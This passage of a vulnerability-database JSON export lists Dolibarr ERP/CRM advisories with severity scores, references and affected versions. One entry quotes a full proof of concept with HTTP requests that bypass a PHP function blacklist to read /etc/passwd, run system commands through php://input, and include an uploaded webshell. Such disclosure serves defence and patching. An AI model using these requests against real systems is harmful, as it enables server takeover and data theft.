ue":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/c1b530f58f6f01081ddbeaa2092ef308c3ec2727"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-12669","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-12669"},{"reference_url":"https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/11.0.4","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_sys
tem":"generic_textual","scoring_elements":""}],"url":"https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/11.0.4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/75137?format=json","purl":"pkg:composer/dolibarr/dolibarr@11.0.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-8kn4-yfnc-sfaw"},{"vulnerability":"VCID-8q73-qf6x-zyde"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-ssn5-ht3p-3kgh"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibar
r/dolibarr@11.0.4"},{"url":"http://public2.vulnerablecode.io/api/packages/125038?format=json","purl":"pkg:composer/dolibarr/dolibarr@12.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@12.0.0"}],"aliases":["CVE-2020-12669","GHSA-rg8m-84jf-9367"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-s9rz-z4dd-rkhm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/39275?format=json","vulnerability_id":"VCID
-t7pd-jyds-3ka5","summary":"Dolibarr vulnerable to remote code execution via uppercase manipulation\nDolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: <?PHP instead of <?php in injected data.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-30253","reference_id":"","reference_type":"","scores":[{"value":"0.89458","scoring_system":"epss","scoring_elements":"0.99564","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-30253"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-01-14T17:09:35Z/"}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-30253","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-30253"},{"reference_url":"https://www.swascan.com/blog","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.swascan.com/blog"},{"reference_url":"https://www.swascan.com/security-advisory-dolibarr-17-0-0","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""
}],"url":"https://www.swascan.com/security-advisory-dolibarr-17-0-0"},{"reference_url":"https://www.swascan.com/blog/","reference_id":"blog","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-01-14T17:09:35Z/"}],"url":"https://www.swascan.com/blog/"},{"reference_url":"https://github.com/advisories/GHSA-9wqr-5jp4-mjmh","reference_id":"GHSA-9wqr-5jp4-mjmh","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-9wqr-5jp4-mjmh"},{"reference_url":"https://www.swascan.com/security-advisory-dolibarr-17-0-0/","reference_id":"security-advisory-dolibarr-17-0-0","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-01-14T17:09:35Z/"}],"url":"https://www.swascan.com/security-advisory-dolibarr-17-0-0/"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/67967?format=json","purl":"pkg:composer/dolibarr/dolibarr@17.0.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@17.0.1"}],"aliases":["CVE-2023-30253","GHSA-9wqr-5jp4-mjmh"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-t7pd-jyds-3ka5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/33691?format=json","vulnerability_id":"VCID-tcmr-1whv-tqhh","summary":"Dolibarr has Remote Code Execution Vulnerability (Bypass)\n# Summary\n\nThe Dolibarr backend provides the function of adding Menu, and supports setting permissions for the added 
Menu:\n\n![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228164114688.png)\n\nThis is the trigger point of the vulnerability. The submitted permission can be php code, and it will be executed when viewing the created Menu:\n\n- htdocs/admin/menus/edit.php\n\n![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228164445656.png)\n\nAs you can see, in edit.php, if the created menu is set to `$menu->perms`, the `dol_eval()` method will be called. Following the `dol_eval()` method, we can see that it will filter the dangerous php functions in `$menu->perms` through the blacklist set in `$forbiddenphpfunctions`:\n\n![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228164725548.png)\n\nHowever, the blacklist here is not comprehensive. For example, the `include_once` and `require_once` functions can easily pass the blacklist check, which will cause file inclusion vulnerabilities. Moreover, if the `allow_url_include` option is enabled in php.ini, arbitrary code execution will occur. 
**The most serious thing is that we can cooperate with the file upload at `/htdocs/user/document.php?id=1&uploadform=1` to achieve more general arbitrary code execution.**\n\n# Proof of Concept\n\n## Local File Inclusion\n\n(1) First, create a Menu and set \"Permissions\" to `include_once('/etc/passwd')` (note that `''` must be used here because `\"` will be detected):\n\n```http\nPOST /htdocs/admin/menus/edit.php?action=add&token=fae63868ce9c2a7eece04a49ffdbe23f&menuId=0 HTTP/1.1\nHost: 192.168.31.31\nContent-Length: 210\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://192.168.31.31\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nReferer: http://192.168.31.31/htdocs/admin/menus/edit.php?menuId=0&action=create&menu_handler=all&backtopage=%2Fhtdocs%2Fadmin%2Fmenus%2Findex.php\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,ru;q=0.7,ja;q=0.6\nCookie: DOLSESSID_cc5001a0224d79c07308a0908c6213b79e5d7d10=82ef3f1d798bf58a0e11c0cbacc390dd\nConnection: close\n\ntoken=fae63868ce9c2a7eece04a49ffdbe23f&menu_handler=all&user=2&type=top&propertymainmenu=test1test&titre=test1test&url=test1test&langs=&position=100&target=&enabled=1&perms=include_once('/etc/passwd')&save=Save\n```\n\n![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228165411557.png)\n\n(2) Then we look at the Menu we just created, and we can see that the contents of `/etc/passwd` have been successfully read out:\n\n![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228165517668.png)\n\n## Remote Code Execution - 1\n\n(1) We first ensure that the `allow_url_include` option of php.ini on the server is 
`On`:\n\n![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228160154464.png)\n\nAt this point, we can use remote file inclusion and cooperate with `php://input` to achieve arbitrary code execution.\n\n(2) Create a Menu and set \"Permissions\" to `include_once('php://input')` (note that `''` must be used here because `\"` will be detected):\n\n```http\nPOST /htdocs/admin/menus/edit.php?action=add&token=fae63868ce9c2a7eece04a49ffdbe23f&menuId=0 HTTP/1.1\nHost: 192.168.31.31\nContent-Length: 210\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://192.168.31.31\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nReferer: http://192.168.31.31/htdocs/admin/menus/edit.php?menuId=0&action=create&menu_handler=all&backtopage=%2Fhtdocs%2Fadmin%2Fmenus%2Findex.php\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,ru;q=0.7,ja;q=0.6\nCookie: DOLSESSID_cc5001a0224d79c07308a0908c6213b79e5d7d10=82ef3f1d798bf58a0e11c0cbacc390dd\nConnection: close\n\ntoken=fae63868ce9c2a7eece04a49ffdbe23f&menu_handler=all&user=2&type=top&propertymainmenu=test1test&titre=test1test&url=test1test&langs=&position=100&target=&enabled=1&perms=include_once('php://input')&save=Save\n```\n\n![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228165822802.png)\n\n(3) Finally, the system command is successfully executed through the POST request:\n\n```http\nPOST http://192.168.31.31/htdocs/admin/menus/edit.php?menu_handler=all&action=edit&token=fae63868ce9c2a7eece04a49ffdbe23f&menuId=24 HTTP/1.1\nHost: 192.168.31.31\nContent-Length: 27\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://192.168.31.31\nContent-Type: 
application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nReferer: http://192.168.31.31/index.php?url=/etc/passwd\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,ru;q=0.7,ja;q=0.6\nCookie: DOLSESSID_cc5001a0224d79c07308a0908c6213b79e5d7d10=82ef3f1d798bf58a0e11c0cbacc390dd\nConnection: close\n\n<?php system('ls -al /');?>\n```\n\n![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228165923443.png)\n\n## Remote Code Execution - 2 (File Inclusion with file upload)\n\nAt this point, we are absolutely sure that a file inclusion vulnerability can be achieved by setting \"Permissions\", and arbitrary code execution can be achieved with `allow_url_include = On`. However, the setting `allow_url_include = On` does not exist on every server. Therefore, to achieve the purpose of universal arbitrary code execution, we need to cooperate with the file upload (without suffix) function.\n\n(1) We can upload a file containing php webshell code through the \"Attach a new file/document\" function in `/htdocs/user/document.php?id=1&uploadform=1`. The file name is \"shell\" (this file There must be no suffix, otherwise the detection of `.` by `dol_eval()` cannot be bypassed when setting \"Permissions\" later. 
Among all file upload points, only \"Attach a new file/document\" can be Upload files without suffix):\n\n![image-20240228232622397](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228232622397.png)\n\n(2) upload the \"shell\":\n\n![image-20240228231150328](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228231150328.png)\n\nImages uploaded from here will eventually be saved on the server in the \"/var/www/html/documents/users/1/\" directory:\n\n![image-20240228230738376](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228230738376.png)\n\n（3）create a Menu and set \"Permissions\" to `include_once('/var/www/html/documents/users/1/shell')` (note that `''` must be used here because `\"` will be detected).\n\n```http\nPOST /htdocs/admin/menus/edit.php?action=add&token=fae63868ce9c2a7eece04a49ffdbe23f&menuId=0 HTTP/1.1\nHost: 192.168.31.31\nContent-Length: 210\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://192.168.31.31\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nReferer: http://192.168.31.31/htdocs/admin/menus/edit.php?menuId=0&action=create&menu_handler=all&backtopage=%2Fhtdocs%2Fadmin%2Fmenus%2Findex.php\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,ru;q=0.7,ja;q=0.6\nCookie: DOLSESSID_cc5001a0224d79c07308a0908c6213b79e5d7d10=82ef3f1d798bf58a0e11c0cbacc390dd\nConnection: close\n\ntoken=e71337659d7cbae16b0279b4e04535aa&menu_handler=all&user=2&type=left&propertymainmenu=whaoamia&menuIdParent=123&titre=whaoamia&picto=whaoamia&url=whaoamia&langs=&position=100&enabled=1&perms=include_once('/var/www/html/documents/users/1/shell')&target=&save=Save\n```\n\n(4) Finally, when we 
access the Menu we just created, we can find that the \"/var/www/html/documents/users/1/shell\" file is included:\n\n![image-20240228231800914](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228231800914.png)\n\nFinally, arbitrary code execution was successfully achieved:\n\n![image-20240228231703417](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228231703417.png)\n\n![image-20240228232116013](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228232116013.png)\n\n# Impact\n\nThis vulnerability can run arbitrary commands in the file system and read sensitive files.\n\n# Say it at the end\n\nIf you confirm the vulnerability, please apply for a CVE to notify all users to update.","references":[{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/blob/21.0.2/htdocs/admin/menus/edit.php","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/blob/21.0.2/htdocs/admin/menus/edit.php"},{"reference_url":"https://github.com/Dolibarr/dolibarr/blob/21.0.2/htdocs/user/document.php","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/blob/21.0.2/htdocs/user/document.php"},{"reference_url":"https://github.com/Dolibarr/dolibarr/security/advisor
ies/GHSA-49xw-hw94-fmv2","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-49xw-hw94-fmv2"},{"reference_url":"https://github.com/advisories/GHSA-49xw-hw94-fmv2","reference_id":"GHSA-49xw-hw94-fmv2","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-49xw-hw94-fmv2"}],"fixed_packages":[],"aliases":["GHSA-49xw-hw94-fmv2"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-tcmr-1whv-tqhh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/49888?format=json","vulnerability_id":"VCID-ty2n-5vns-abgk","summary":"SQL Injection in dolibarr\ndolibarr is vulnerable to Improper Neutralization of Special Elements used in an SQL Command.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0224","reference_id":"","reference_type":"","scores":[{"value":"0.00515","scoring_system":"epss","scoring_elements":"0.66905","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0224"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/b9b45fb50618aa8053961f50bc8604b188d0ea79","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://git
hub.com/dolibarr/dolibarr/commit/b9b45fb50618aa8053961f50bc8604b188d0ea79"},{"reference_url":"https://huntr.dev/bounties/f1d1ce3e-ca92-4c7b-b1b8-934e28eaa486","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/f1d1ce3e-ca92-4c7b-b1b8-934e28eaa486"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0224","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0224"},{"reference_url":"https://github.com/advisories/GHSA-j545-frh3-r9gq","reference_id":"GHSA-j545-frh3-r9gq","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j545-frh3-r9gq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/36973?format=json","purl":"pkg:composer/dolibarr/dolibarr@15.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"v
ulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.0"}],"aliases":["CVE-2022-0224","GHSA-j545-frh3-r9gq"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ty2n-5vns-abgk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/57038?format=json","vulnerability_id":"VCID-u1mx-ymsz-wqa2","summary":"Dolibarr ERP and CRM contain XSS Vulnerability\nDolibarr ERP/CRM is affected by stored Cross-Site Scripting (XSS) in versions through 7.0.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2017-18259","reference_id":"","reference_type":"","scores":[{"value":"0.00185","scoring_system":"epss","scoring_elements":"0.4001","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2017-18259"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2017-18259","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2017-18259"},{"reference_url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2017-008","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cv
ssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2017-008"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/180056?format=json","purl":"pkg:composer/dolibarr/dolibarr@7.0.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3zbv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-7ee4-1bfq-efd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-9v1w-ayuw-wbhy"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-jrxu-cz7p-3uhe"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuhh"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerab
